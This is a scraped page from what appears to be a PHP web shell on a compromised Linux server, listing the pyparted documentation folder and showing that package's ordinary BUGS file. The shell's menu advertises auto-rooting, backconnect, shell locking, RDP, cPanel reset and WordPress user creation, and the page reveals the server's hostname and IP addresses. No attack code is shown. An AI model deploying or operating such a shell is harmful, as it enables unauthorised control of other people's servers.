Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pyparted-3.9 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
111
B
-rw-r--r--
BUGS
1.1
KB
-rw-r--r--
COPYING
17.56
KB
-rw-r--r--
ChangeLog
300.71
KB
-rw-r--r--
NEWS
518
B
-rw-r--r--
README
2.58
KB
-rw-r--r--
TODO
3.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BUGS
List bugs in this file, numbered, with an example that can be run from the Python interactive shell. --------------------------------------------------------------------------- 1) parted.Disk.getLogicalPartitions() crashes device = parted.getDevice("/dev/sda") disk = parted.Disk(device) disk.getLogicalPartitions() 2) pydisk.c: py_ped_disk_type_get() returns NULL without setting an exception when called with None argument # XXX: NEED REPRODUCER py_ped_disk_type_check_feature() returns NULL without setting an exception when called with 0 as argument # XXX: NEED REPRODUCER py_ped_geometry_read() and py_ped_device_read() do not work properly when the read data contains 0 bytes # XXX: NEED REPRODUCER 3) import parted # create a parted.Disk for part in disk.partitions: print part "argument 2 must be _ped.Geometry, not _ped.Geometry" 4) import parted device = parted.Device(path="/dev/dm-0") disk = parted.Disk(device=device) disk.partitions[0].getDeviceNodeName() expected: "unrecognized disk label" get: "/dev/dm-01"
Close